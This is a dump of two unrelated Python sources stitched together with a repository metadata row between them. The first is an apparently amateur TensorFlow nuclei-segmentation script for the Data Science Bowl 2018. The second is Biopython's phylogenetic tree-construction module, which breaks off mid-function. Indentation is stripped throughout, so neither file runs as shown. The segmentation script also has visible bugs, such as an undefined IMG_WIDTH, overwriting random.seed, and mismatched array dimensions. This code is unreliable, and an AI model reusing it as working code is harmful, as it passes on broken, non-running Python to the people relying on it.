IMG_HEIGHT = 350
IMG_CHANNELS = 3
TRAIN_PATH = './Dropbox/projects/dataSciBowl2018/input/train/'
TEST_PATH = './Dropbox/projects/dataSciBowl2018/input/test/'
warnings.filterwarnings('ignore', category=UserWarning, module='skimage')
seed = 42
random.seed = seed
np.random.seed = seed
#%%
# Get train and test IDs
train_ids = next(os.walk(TRAIN_PATH))[1]
test_ids = next(os.walk(TEST_PATH))[1]
#%%
# Get and resize train images and masks
#images = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
images = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH), dtype=np.uint8)
labels = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
#images, labels
#%%
for i in range(len(train_ids)):
id_ = train_ids[i]
path = TRAIN_PATH + id_
img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
#img = imread(path + '/images/' + id_ + '.png', as_grey=True)[:,:]
img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
for rownum in range(IMG_WIDTH):
for colnum in range(IMG_WIDTH):
img[rownum,colnum,0] = np.average(img[rownum,colnum,:])
images[i] = img[:,:,0]
mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
for mask_file in next(os.walk(path + '/masks/'))[2]:
mask_ = imread(path + '/masks/' + mask_file)
mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
preserve_range=True), axis=-1)
mask = np.maximum(mask, mask_)
labels[i] = mask
#%%
for i in range(len(train_ids)):
grey = np.zeros([IMG_WIDTH, IMG_WIDTH]) # init 2D numpy array
# get row number
for rownum in range(IMG_WIDTH):
for colnum in range(IMG_WIDTH):
grey[rownum,colnum] = np.average(images[i,rownum,colnum,:])
images[i,:,:,0] = grey
#%%
X_train = images[:int(0.9*len(train_ids)),:,:]
Y_train = labels[:int(0.9*len(train_ids)),:,:]
Y_train = Y_train.astype(np.float32)
X_validate = images[int(0.9*len(train_ids)):,:,:]
Y_validate = labels[int(0.9*len(train_ids)):,:,:]
Y_validate = Y_validate.astype(np.float32)
#%%
X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
sizes_test = []
for i in range(len(test_ids)):
id_ = test_ids[i]
path = TEST_PATH + id_
img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
sizes_test.append([img.shape[0], img.shape[1]])
img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
X_test[i] = img
#%%
def shuffle():
global images, labels
p = np.random.permutation(len(X_train))
images = X_train[p]
labels = Y_train[p]
def next_batch(batch_s, iters):
if(iters == 0):
shuffle()
count = batch_s * iters
return images[count:(count + batch_s)], labels[count:(count + batch_s)]
#%%
data_ = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
pca = PCA(n_components=20)
pca.fit(img[:,:,0])
pca.explained_variance_ratio_
pca.fit_transform(img[:,:,0])
#%%
PICS = 25
BOX = IMG_WIDTH/10
IMG_CHANNELS = 1
#%%
STRIDE = BOX
avg = np.zeros([PICS,int(IMG_WIDTH/BOX),int(IMG_HEIGHT/BOX),IMG_CHANNELS])
var = np.zeros([PICS,int(IMG_WIDTH/BOX),int(IMG_HEIGHT/BOX),IMG_CHANNELS])
for im_idx in range(PICS):
# for ch in range(IMG_CHANNELS):
for w in range(int(IMG_WIDTH/BOX)):
for h in range(int(IMG_HEIGHT/BOX)):
avg[im_idx,w,h] = np.average(X_train[im_idx,int(w*BOX):int((w+1)*BOX),int(h*BOX):int((h+1)*BOX)])
var[im_idx,w,h] = np.var(X_train[im_idx,int(w*BOX):int((w+1)*BOX),int(h*BOX):int((h+1)*BOX)])
#%%
avg_samp = np.zeros([PICS,int((IMG_WIDTH/BOX) * (IMG_HEIGHT/BOX) * IMG_CHANNELS)])
var_samp = np.zeros([PICS,int((IMG_WIDTH/BOX) * (IMG_HEIGHT/BOX) * IMG_CHANNELS)])
for pics in range(PICS):
avg_samp[pics,:] = avg[pics,:,:,:].flatten()
var_samp[pics,:] = var[pics,:,:,:].flatten()
features = np.append(avg_samp,var_samp,axis=1)
#%%
kmeans = KMeans(n_clusters=10).fit_predict(features)
#%%
X_tf = tf.placeholder(tf.float32, [None, IMG_WIDTH, IMG_HEIGHT, 3])
Y_tf = tf.placeholder(tf.float32, [None, IMG_WIDTH, IMG_HEIGHT, 1])
lr = tf.placeholder(tf.float32)
#%%
def deconv2d(input_tensor, filter_size, output_size, out_channels, in_channels, name):
dyn_input_shape = tf.shape(input_tensor)
batch_size = dyn_input_shape[0]
out_shape = tf.stack([batch_size, output_size, output_size, out_channels])
filter_shape = [filter_size, filter_size, out_channels, in_channels]
strides = [1, 2, 2, 1]
w = tf.get_variable(name=name, shape=filter_shape)
h1 = tf.nn.conv2d_transpose(input_tensor, w, out_shape, strides, padding='VALID')
return h1
Y1 = tf.layers.conv2d(X_tf, filters=16, kernel_size=3, strides=1, padding="VALID", activation=tf.nn.relu)
Y2 = tf.layers.conv2d(Y1, filters=32, kernel_size=2, strides=2, padding="VALID", activation=tf.nn.relu)
Y3 = tf.layers.conv2d(Y2, filters=64, kernel_size=3, strides=2, padding="VALID", activation=tf.nn.relu)
Y4 = tf.layers.conv2d(Y3, filters=64, kernel_size=3, strides=2, padding="VALID", activation=tf.nn.relu)
Y3_ = deconv2d(Y4, 4, 32, 32, 64, "Y3_deconv")
Y3_ = tf.nn.relu(Y3_)
Y2_ = deconv2d(Y3_, 2, 64, 16, 32, "Y2_deconv")
Y2_ = tf.nn.relu(Y2_)
logits = deconv2d(Y2_, 2, 350, 1, 16, "logits_deconv")
#%%
loss = tf.reduce_mean(tf.square(Y_tf - logits))
optimizer = tf.train.AdamOptimizer(lr).minimize(loss)
# init
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
iter_count = 0
for i in range(12000):
# training on batches of 5 images with 5 mask images
if(iter_count > 120):
iter_count = 0
batch_X, batch_Y = next_batch(5, iter_count)
iter_count += 1
feed_dict = {X_tf: batch_X, Y_tf: batch_Y, lr: 0.0001}
loss_value = sess.run([loss], feed_dict=feed_dict)
if(i % 500 == 0):
print("training loss:", str(loss_value))
#print("training acc:" + str(acc))
#test_data = {X: X_validate, Y_: Y_validate}
#test_acc, tests_loss = sess.run([accuracy, loss], feed_dict=test_data)
print("Done!")
#%%
| [
"christian.marin7@gmail.com"
] | christian.marin7@gmail.com |
4142964e5405ab44216a3c53d6d75234942ac6d4 | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/Bio/Phylo/TreeConstruction.py | c6c95154385d69c86f76450b142cbf940399a862 | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 42,982 | py | # Copyright (C) 2013 by Yanbo Ye (yeyanbo289@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Classes and methods for tree construction."""
import itertools
import copy
from Bio.Phylo import BaseTree
from Bio.Align import MultipleSeqAlignment
from Bio.SubsMat import MatrixInfo
from Bio import _py3k
from Bio._py3k import zip, range
def _is_numeric(x):
"""Return True if is numeric."""
return _py3k._is_int_or_long(x) or isinstance(x, (float, complex))
class _Matrix(object):
"""Base class for distance matrix or scoring matrix.
Accepts a list of names and a lower triangular matrix.::
matrix = [[0],
[1, 0],
[2, 3, 0],
[4, 5, 6, 0]]
represents the symmetric matrix of
[0,1,2,4]
[1,0,3,5]
[2,3,0,6]
[4,5,6,0]
:Parameters:
names : list
names of elements, used for indexing
matrix : list
nested list of numerical lists in lower triangular format
Examples
--------
>>> from Bio.Phylo.TreeConstruction import _Matrix
>>> names = ['Alpha', 'Beta', 'Gamma', 'Delta']
>>> matrix = [[0], [1, 0], [2, 3, 0], [4, 5, 6, 0]]
>>> m = _Matrix(names, matrix)
>>> m
_Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [1, 0], [2, 3, 0], [4, 5, 6, 0]])
You can use two indices to get or assign an element in the matrix.
>>> m[1,2]
3
>>> m['Beta','Gamma']
3
>>> m['Beta','Gamma'] = 4
>>> m['Beta','Gamma']
4
Further more, you can use one index to get or assign a list of elements related to that index.
>>> m[0]
[0, 1, 2, 4]
>>> m['Alpha']
[0, 1, 2, 4]
>>> m['Alpha'] = [0, 7, 8, 9]
>>> m[0]
[0, 7, 8, 9]
>>> m[0,1]
7
Also you can delete or insert a column&row of elemets by index.
>>> m
_Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [7, 0], [8, 4, 0], [9, 5, 6, 0]])
>>> del m['Alpha']
>>> m
_Matrix(names=['Beta', 'Gamma', 'Delta'], matrix=[[0], [4, 0], [5, 6, 0]])
>>> m.insert('Alpha', [0, 7, 8, 9] , 0)
>>> m
_Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [7, 0], [8, 4, 0], [9, 5, 6, 0]])
"""
def __init__(self, names, matrix=None):
"""Initialize matrix.
Arguments are a list of names, and optionally a list of lower
triangular matrix data (zero matrix used by default).
"""
# check names
if isinstance(names, list) and all(isinstance(s, str) for s in names):
if len(set(names)) == len(names):
self.names = names
else:
raise ValueError("Duplicate names found")
else:
raise TypeError("'names' should be a list of strings")
# check matrix
if matrix is None:
# create a new one with 0 if matrix is not assigned
matrix = [[0] * i for i in range(1, len(self) + 1)]
self.matrix = matrix
else:
# check if all elements are numbers
if (isinstance(matrix, list) and
all(isinstance(l, list) for l in matrix) and
all(_is_numeric(n) for n in [item for sublist in matrix
for item in sublist])):
# check if the same length with names
if len(matrix) == len(names):
# check if is lower triangle format
if [len(m) for m in matrix] == list(range(1, len(self) + 1)):
self.matrix = matrix
else:
raise ValueError(
"'matrix' should be in lower triangle format")
else:
raise ValueError(
"'names' and 'matrix' should be the same size")
else:
raise TypeError("'matrix' should be a list of numerical lists")
def __getitem__(self, item):
"""Access value(s) by the index(s) or name(s).
For a _Matrix object 'dm'::
dm[i] get a value list from the given 'i' to others;
dm[i, j] get the value between 'i' and 'j';
dm['name'] map name to index first
dm['name1', 'name2'] map name to index first
"""
# Handle single indexing
if isinstance(item, (int, str)):
index = None
if isinstance(item, int):
index = item
elif isinstance(item, str):
if item in self.names:
index = self.names.index(item)
else:
raise ValueError("Item not found.")
else:
raise TypeError("Invalid index type.")
# check index
if index > len(self) - 1:
raise IndexError("Index out of range.")
return [self.matrix[index][i] for i in range(0, index)] + [self.matrix[i][index] for i in range(index, len(self))]
# Handle double indexing
elif len(item) == 2:
row_index = None
col_index = None
if all(isinstance(i, int) for i in item):
row_index, col_index = item
elif all(isinstance(i, str) for i in item):
row_name, col_name = item
if row_name in self.names and col_name in self.names:
row_index = self.names.index(row_name)
col_index = self.names.index(col_name)
else:
raise ValueError("Item not found.")
else:
raise TypeError("Invalid index type.")
# check index
if row_index > len(self) - 1 or col_index > len(self) - 1:
raise IndexError("Index out of range.")
if row_index > col_index:
return self.matrix[row_index][col_index]
else:
return self.matrix[col_index][row_index]
else:
raise TypeError("Invalid index type.")
def __setitem__(self, item, value):
"""Set value by the index(s) or name(s).
Similar to __getitem__::
dm[1] = [1, 0, 3, 4] set values from '1' to others;
dm[i, j] = 2 set the value from 'i' to 'j'
"""
# Handle single indexing
if isinstance(item, (int, str)):
index = None
if isinstance(item, int):
index = item
elif isinstance(item, str):
if item in self.names:
index = self.names.index(item)
else:
raise ValueError("Item not found.")
else:
raise TypeError("Invalid index type.")
# check index
if index > len(self) - 1:
raise IndexError("Index out of range.")
# check and assign value
if isinstance(value, list) and all(_is_numeric(n) for n in value):
if len(value) == len(self):
for i in range(0, index):
self.matrix[index][i] = value[i]
for i in range(index, len(self)):
self.matrix[i][index] = value[i]
else:
raise ValueError("Value not the same size.")
else:
raise TypeError("Invalid value type.")
# Handle double indexing
elif len(item) == 2:
row_index = None
col_index = None
if all(isinstance(i, int) for i in item):
row_index, col_index = item
elif all(isinstance(i, str) for i in item):
row_name, col_name = item
if row_name in self.names and col_name in self.names:
row_index = self.names.index(row_name)
col_index = self.names.index(col_name)
else:
raise ValueError("Item not found.")
else:
raise TypeError("Invalid index type.")
# check index
if row_index > len(self) - 1 or col_index > len(self) - 1:
raise IndexError("Index out of range.")
# check and assign value
if _is_numeric(value):
if row_index > col_index:
self.matrix[row_index][col_index] = value
else:
self.matrix[col_index][row_index] = value
else:
raise TypeError("Invalid value type.")
else:
raise TypeError("Invalid index type.")
def __delitem__(self, item):
"""Delete related distances by the index or name."""
index = None
if isinstance(item, int):
index = item
elif isinstance(item, str):
index = self.names.index(item)
else:
raise TypeError("Invalid index type.")
# remove distances related to index
for i in range(index + 1, len(self)):
del self.matrix[i][index]
del self.matrix[index]
# remove name
del self.names[index]
def insert(self, name, value, index=None):
"""Insert distances given the name and value.
:Parameters:
name : str
name of a row/col to be inserted
value : list
a row/col of values to be inserted
"""
if isinstance(name, str):
# insert at the given index or at the end
if index is None:
index = len(self)
if not isinstance(index, int):
raise TypeError("Invalid index type.")
# insert name
self.names.insert(index, name)
# insert elements of 0, to be assigned
self.matrix.insert(index, [0] * index)
for i in range(index, len(self)):
self.matrix[i].insert(index, 0)
# assign value
self[index] = value
else:
raise TypeError("Invalid name type.")
def __len__(self):
"""Matrix length."""
return len(self.names)
def __repr__(self):
"""Return Matrix as a string."""
return self.__class__.__name__ \
+ "(names=%s, matrix=%s)" \
% tuple(map(repr, (self.names, self.matrix)))
def __str__(self):
"""Get a lower triangular matrix string."""
matrix_string = '\n'.join(
[self.names[i] + "\t" + "\t".join([str(n) for n in self.matrix[i]])
for i in range(0, len(self))])
matrix_string = matrix_string + "\n\t" + "\t".join(self.names)
return matrix_string
class DistanceMatrix(_Matrix):
"""Distance matrix class that can be used for distance based tree algorithms.
All diagonal elements will be zero no matter what the users provide.
"""
def __init__(self, names, matrix=None):
"""Initialize the class."""
_Matrix.__init__(self, names, matrix)
self._set_zero_diagonal()
def __setitem__(self, item, value):
"""Set Matrix's items to values."""
_Matrix.__setitem__(self, item, value)
self._set_zero_diagonal()
def _set_zero_diagonal(self):
"""Set all diagonal elements to zero (PRIVATE)."""
for i in range(0, len(self)):
self.matrix[i][i] = 0
def format_phylip(self, handle):
"""Write data in Phylip format to a given file-like object or handle.
The output stream is the input distance matrix format used with Phylip
programs (e.g. 'neighbor'). See:
http://evolution.genetics.washington.edu/phylip/doc/neighbor.html
:Parameters:
handle : file or file-like object
A writeable file handle or other object supporting the 'write'
method, such as StringIO or sys.stdout. On Python 3, should be
open in text mode.
"""
handle.write(" {0}\n".format(len(self.names)))
# Phylip needs space-separated, vertically aligned columns
name_width = max(12, max(map(len, self.names)) + 1)
value_fmts = ("{" + str(x) + ":.4f}"
for x in range(1, len(self.matrix) + 1))
row_fmt = "{0:" + str(name_width) + "s}" + " ".join(value_fmts) + "\n"
for i, (name, values) in enumerate(zip(self.names, self.matrix)):
# Mirror the matrix values across the diagonal
mirror_values = (self.matrix[j][i]
for j in range(i + 1, len(self.matrix)))
fields = itertools.chain([name], values, mirror_values)
handle.write(row_fmt.format(*fields))
# Shim for compatibility with Biopython<1.70 (#1304)
_DistanceMatrix = DistanceMatrix
class DistanceCalculator(object):
"""Class to calculate the distance matrix from a DNA or Protein.
Multiple Sequence Alignment(MSA) and the given name of the
substitution model.
Currently only scoring matrices are used.
:Parameters:
model : str
Name of the model matrix to be used to calculate distance.
The attribute ``dna_matrices`` contains the available model
names for DNA sequences and ``protein_matrices`` for protein
sequences.
Examples
--------
>>> from Bio.Phylo.TreeConstruction import DistanceCalculator
>>> from Bio import AlignIO
>>> aln = AlignIO.read(open('Tests/TreeConstruction/msa.phy'), 'phylip')
>>> print(aln)
SingleLetterAlphabet() alignment with 5 rows and 13 columns
AACGTGGCCACAT Alpha
AAGGTCGCCACAC Beta
GAGATTTCCGCCT Delta
GAGATCTCCGCCC Epsilon
CAGTTCGCCACAA Gamma
DNA calculator with 'identity' model::
>>> calculator = DistanceCalculator('identity')
>>> dm = calculator.get_distance(aln)
>>> print(dm)
Alpha 0
Beta 0.230769230769 0
Gamma 0.384615384615 0.230769230769 0
Delta 0.538461538462 0.538461538462 0.538461538462 0
Epsilon 0.615384615385 0.384615384615 0.461538461538 0.153846153846 0
Alpha Beta Gamma Delta Epsilon
Protein calculator with 'blosum62' model::
>>> calculator = DistanceCalculator('blosum62')
>>> dm = calculator.get_distance(aln)
>>> print(dm)
Alpha 0
Beta 0.369047619048 0
Gamma 0.493975903614 0.25 0
Delta 0.585365853659 0.547619047619 0.566265060241 0
Epsilon 0.7 0.355555555556 0.488888888889 0.222222222222 0
Alpha Beta Gamma Delta Epsilon
"""
dna_alphabet = ['A', 'T', 'C', 'G']
# BLAST nucleic acid scoring matrix
blastn = [[5],
[-4, 5],
[-4, -4, 5],
[-4, -4, -4, 5]]
# transition/transversion scoring matrix
trans = [[6],
[-5, 6],
[-5, -1, 6],
[-1, -5, -5, 6]]
protein_alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y',
'Z']
# matrices available
dna_matrices = {'blastn': blastn, 'trans': trans}
protein_models = MatrixInfo.available_matrices
protein_matrices = {name: getattr(MatrixInfo, name)
for name in protein_models}
dna_models = list(dna_matrices.keys())
models = ['identity'] + dna_models + protein_models
def __init__(self, model='identity', skip_letters=None):
"""Initialize with a distance model."""
# Shim for backward compatibility (#491)
if skip_letters:
self.skip_letters = skip_letters
elif model == 'identity':
self.skip_letters = ()
else:
self.skip_letters = ('-', '*')
if model == 'identity':
self.scoring_matrix = None
elif model in self.dna_models:
self.scoring_matrix = _Matrix(self.dna_alphabet,
self.dna_matrices[model])
elif model in self.protein_models:
self.scoring_matrix = self._build_protein_matrix(
self.protein_matrices[model])
else:
raise ValueError("Model not supported. Available models: " +
", ".join(self.models))
def _pairwise(self, seq1, seq2):
"""Calculate pairwise distance from two sequences (PRIVATE).
Returns a value between 0 (identical sequences) and 1 (completely
different, or seq1 is an empty string.)
"""
score = 0
max_score = 0
if self.scoring_matrix:
max_score1 = 0
max_score2 = 0
for i in range(0, len(seq1)):
l1 = seq1[i]
l2 = seq2[i]
if l1 in self.skip_letters or l2 in self.skip_letters:
continue
if l1 not in self.scoring_matrix.names:
raise ValueError("Bad alphabet '%s' in sequence '%s' at position '%s'"
% (l1, seq1.id, i))
if l2 not in self.scoring_matrix.names:
raise ValueError("Bad alphabet '%s' in sequence '%s' at position '%s'"
% (l2, seq2.id, i))
max_score1 += self.scoring_matrix[l1, l1]
max_score2 += self.scoring_matrix[l2, l2]
score += self.scoring_matrix[l1, l2]
# Take the higher score if the matrix is asymmetrical
max_score = max(max_score1, max_score2)
else:
# Score by character identity, not skipping any special letters
score = sum(l1 == l2
for l1, l2 in zip(seq1, seq2)
if l1 not in self.skip_letters and l2 not in self.skip_letters)
max_score = len(seq1)
if max_score == 0:
return 1 # max possible scaled distance
return 1 - (score * 1.0 / max_score)
def get_distance(self, msa):
"""Return a DistanceMatrix for MSA object.
:Parameters:
msa : MultipleSeqAlignment
DNA or Protein multiple sequence alignment.
"""
if not isinstance(msa, MultipleSeqAlignment):
raise TypeError("Must provide a MultipleSeqAlignment object.")
names = [s.id for s in msa]
dm = DistanceMatrix(names)
for seq1, seq2 in itertools.combinations(msa, 2):
dm[seq1.id, seq2.id] = self._pairwise(seq1, seq2)
return dm
def _build_protein_matrix(self, subsmat):
"""Convert matrix from SubsMat format to _Matrix object (PRIVATE)."""
protein_matrix = _Matrix(self.protein_alphabet)
for k, v in subsmat.items():
aa1, aa2 = k
protein_matrix[aa1, aa2] = v
return protein_matrix
class TreeConstructor(object):
"""Base class for all tree constructor."""
def build_tree(self, msa):
"""Caller to built the tree from a MultipleSeqAlignment object.
This should be implemented in subclass.
"""
raise NotImplementedError("Method not implemented!")
class DistanceTreeConstructor(TreeConstructor):
"""Distance based tree constructor.
:Parameters:
method : str
Distance tree construction method, 'nj'(default) or 'upgma'.
distance_calculator : DistanceCalculator
The distance matrix calculator for multiple sequence alignment.
It must be provided if ``build_tree`` will be called.
Examples
--------
>>> from TreeConstruction import DistanceTreeConstructor
>>> constructor = DistanceTreeConstructor()
UPGMA Tree:
>>> from Bio.Phylo.TreeConstruction import DistanceCalculator
>>> from Bio import AlignIO
>>> aln = AlignIO.read(open('Tests/TreeConstruction/msa.phy'), 'phylip')
>>> calculator = DistanceCalculator('identity')
>>> dm = calculator.get_distance(aln)
>>> upgmatree = constructor.upgma(dm)
>>> print(upgmatree)
Tree(rooted=True)
Clade(name='Inner4')
Clade(branch_length=0.171955155115, name='Inner1')
Clade(branch_length=0.111111111111, name='Epsilon')
Clade(branch_length=0.111111111111, name='Delta')
Clade(branch_length=0.0673103855608, name='Inner3')
Clade(branch_length=0.0907558806655, name='Inner2')
Clade(branch_length=0.125, name='Gamma')
Clade(branch_length=0.125, name='Beta')
Clade(branch_length=0.215755880666, name='Alpha')
NJ Tree:
>>> njtree = constructor.nj(dm)
>>> print(njtree)
Tree(rooted=False)
Clade(name='Inner3')
Clade(branch_length=0.0142054862889, name='Inner2')
Clade(branch_length=0.239265540676, name='Inner1')
Clade(branch_length=0.0853101915988, name='Epsilon')
Clade(branch_length=0.136912030623, name='Delta')
Clade(branch_length=0.292306275042, name='Alpha')
Clade(branch_length=0.0747705106139, name='Beta')
Clade(branch_length=0.175229489386, name='Gamma')
"""
methods = ['nj', 'upgma']
def __init__(self, distance_calculator=None, method="nj"):
"""Initialize the class."""
if (distance_calculator is None or isinstance(distance_calculator, DistanceCalculator)):
self.distance_calculator = distance_calculator
else:
raise TypeError("Must provide a DistanceCalculator object.")
if isinstance(method, str) and method in self.methods:
self.method = method
else:
raise TypeError("Bad method: " + method +
". Available methods: " + ", ".join(self.methods))
def build_tree(self, msa):
"""Construct and return a Tree, Neighbor Joining or UPGMA."""
if self.distance_calculator:
dm = self.distance_calculator.get_distance(msa)
tree = None
if self.method == 'upgma':
tree = self.upgma(dm)
else:
tree = self.nj(dm)
return tree
else:
raise TypeError("Must provide a DistanceCalculator object.")
def upgma(self, distance_matrix):
"""Construct and return an UPGMA tree.
Constructs and returns an Unweighted Pair Group Method
with Arithmetic mean (UPGMA) tree.
:Parameters:
distance_matrix : DistanceMatrix
The distance matrix for tree construction.
"""
if not isinstance(distance_matrix, DistanceMatrix):
raise TypeError("Must provide a DistanceMatrix object.")
# make a copy of the distance matrix to be used
dm = copy.deepcopy(distance_matrix)
# init terminal clades
clades = [BaseTree.Clade(None, name) for name in dm.names]
# init minimum index
min_i = 0
min_j = 0
inner_count = 0
while len(dm) > 1:
min_dist = dm[1, 0]
# find minimum index
for i in range(1, len(dm)):
for j in range(0, i):
if min_dist >= dm[i, j]:
min_dist = dm[i, j]
min_i = i
min_j = j
# create clade
clade1 = clades[min_i]
clade2 = clades[min_j]
inner_count += 1
inner_clade = BaseTree.Clade(None, "Inner" + str(inner_count))
inner_clade.clades.append(clade1)
inner_clade.clades.append(clade2)
# assign branch length
if clade1.is_terminal():
clade1.branch_length = min_dist * 1.0 / 2
else:
clade1.branch_length = min_dist * \
1.0 / 2 - self._height_of(clade1)
if clade2.is_terminal():
clade2.branch_length = min_dist * 1.0 / 2
else:
clade2.branch_length = min_dist * \
1.0 / 2 - self._height_of(clade2)
# update node list
clades[min_j] = inner_clade
del clades[min_i]
# rebuild distance matrix,
# set the distances of new node at the index of min_j
for k in range(0, len(dm)):
if k != min_i and k != min_j:
dm[min_j, k] = (dm[min_i, k] + dm[min_j, k]) * 1.0 / 2
dm.names[min_j] = "Inner" + str(inner_count)
del dm[min_i]
inner_clade.branch_length = 0
return BaseTree.Tree(inner_clade)
def nj(self, distance_matrix):
"""Construct and return a Neighbor Joining tree.
:Parameters:
distance_matrix : DistanceMatrix
The distance matrix for tree construction.
"""
if not isinstance(distance_matrix, DistanceMatrix):
raise TypeError("Must provide a DistanceMatrix object.")
# make a copy of the distance matrix to be used
dm = copy.deepcopy(distance_matrix)
# init terminal clades
clades = [BaseTree.Clade(None, name) for name in dm.names]
# init node distance
node_dist = [0] * len(dm)
# init minimum index
min_i = 0
min_j = 0
inner_count = 0
# special cases for Minimum Alignment Matrices
if len(dm) == 1:
root = clades[0]
return BaseTree.Tree(root, rooted=False)
elif len(dm) == 2:
# minimum distance will always be [1,0]
min_i = 1
min_j = 0
clade1 = clades[min_i]
clade2 = clades[min_j]
clade1.branch_length = dm[min_i, min_j] / 2.0
clade2.branch_length = dm[min_i, min_j] - clade1.branch_length
inner_clade = BaseTree.Clade(None, "Inner")
inner_clade.clades.append(clade1)
inner_clade.clades.append(clade2)
clades[0] = inner_clade
root = clades[0]
return BaseTree.Tree(root, rooted=False)
while len(dm) > 2:
# calculate nodeDist
for i in range(0, len(dm)):
node_dist[i] = 0
for j in range(0, len(dm)):
node_dist[i] += dm[i, j]
node_dist[i] = node_dist[i] / (len(dm) - 2)
# find minimum distance pair
min_dist = dm[1, 0] - node_dist[1] - node_dist[0]
min_i = 0
min_j = 1
for i in range(1, len(dm)):
for j in range(0, i):
temp = dm[i, j] - node_dist[i] - node_dist[j]
if min_dist > temp:
min_dist = temp
min_i = i
min_j = j
# create clade
clade1 = clades[min_i]
clade2 = clades[min_j]
inner_count += 1
inner_clade = BaseTree.Clade(None, "Inner" + str(inner_count))
inner_clade.clades.append(clade1)
inner_clade.clades.append(clade2)
# assign branch length
clade1.branch_length = (dm[min_i, min_j] + node_dist[min_i] -
node_dist[min_j]) / 2.0
clade2.branch_length = dm[min_i, min_j] - clade1.branch_length
# update node list
clades[min_j] = inner_clade
del clades[min_i]
# rebuild distance matrix,
# set the distances of new node at the index of min_j
for k in range(0, len(dm)):
if k != min_i and k != min_j:
dm[min_j, k] = (dm[min_i, k] + dm[min_j, k] -
dm[min_i, min_j]) / 2.0
dm.names[min_j] = "Inner" + str(inner_count)
del dm[min_i]
# set the last clade as one of the child of the inner_clade
root = None
if clades[0] == inner_clade:
clades[0].branch_length = 0
clades[1].branch_length = dm[1, 0]
clades[0].clades.append(clades[1])
root = clades[0]
else:
clades[0].branch_length = dm[1, 0]
clades[1].branch_length = 0
clades[1].clades.append(clades[0])
root = clades[1]
return BaseTree.Tree(root, rooted=False)
def _height_of(self, clade):
"""Calculate clade height -- the longest path to any terminal (PRIVATE)."""
height = 0
if clade.is_terminal():
height = clade.branch_length
else:
height = height + max(self._height_of(c) for c in clade.clades)
return height
# #################### Tree Scoring and Searching Classes #####################
class Scorer(object):
"""Base class for all tree scoring methods."""
def get_score(self, tree, alignment):
"""Caller to get the score of a tree for the given alignment.
This should be implemented in subclass.
"""
raise NotImplementedError("Method not implemented!")
class TreeSearcher(object):
"""Base class for all tree searching methods."""
def search(self, starting_tree, alignment):
"""Caller to search the best tree with a starting tree.
This should be implemented in subclass.
"""
raise NotImplementedError("Method not implemented!")
class NNITreeSearcher(TreeSearcher):
"""Tree searching with Nearest Neighbor Interchanges (NNI) algorithm.
:Parameters:
scorer : ParsimonyScorer
parsimony scorer to calculate the parsimony score of
different trees during NNI algorithm.
"""
def __init__(self, scorer):
"""Initialize the class."""
if isinstance(scorer, Scorer):
self.scorer = scorer
else:
raise TypeError("Must provide a Scorer object.")
def search(self, starting_tree, alignment):
"""Implement the TreeSearcher.search method.
:Parameters:
starting_tree : Tree
starting tree of NNI method.
alignment : MultipleSeqAlignment
multiple sequence alignment used to calculate parsimony
score of different NNI trees.
"""
return self._nni(starting_tree, alignment)
def _nni(self, starting_tree, alignment):
"""Search for the best parsimony tree using the NNI algorithm (PRIVATE)."""
best_tree = starting_tree
while True:
best_score = self.scorer.get_score(best_tree, alignment)
temp = best_score
for t in self._get_neighbors(best_tree):
score = self.scorer.get_score(t, alignment)
if score < best_score:
best_score = score
best_tree = t
# stop if no smaller score exist
if best_score >= temp:
break
return best_tree
def _get_neighbors(self, tree):
"""Get all neighbor trees of the given tree (PRIVATE).
Currently only for binary rooted trees.
"""
# make child to parent dict
parents = {}
for clade in tree.find_clades():
if clade != tree.root:
node_path = tree.get_path(clade)
# cannot get the parent if the parent is root. Bug?
if len(node_path) == 1:
parents[clade] = tree.root
else:
parents[clade] = node_path[-2]
neighbors = []
root_childs = []
for clade in tree.get_nonterminals(order="level"):
if clade == tree.root:
left = clade.clades[0]
right = clade.clades[1]
root_childs.append(left)
root_childs.append(right)
if not left.is_terminal() and not right.is_terminal():
# make changes around the left_left clade
# left_left = left.clades[0]
left_right = left.clades[1]
right_left = right.clades[0]
right_right = right.clades[1]
# neightbor 1 (left_left + right_right)
del left.clades[1]
del right.clades[1]
left.clades.append(right_right)
right.clades.append(left_right)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# neighbor 2 (left_left + right_left)
del left.clades[1]
del right.clades[0]
left.clades.append(right_left)
right.clades.append(right_right)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# change back (left_left + left_right)
del left.clades[1]
del right.clades[0]
left.clades.append(left_right)
right.clades.insert(0, right_left)
elif clade in root_childs:
# skip root child
continue
else:
# method for other clades
# make changes around the parent clade
left = clade.clades[0]
right = clade.clades[1]
parent = parents[clade]
if clade == parent.clades[0]:
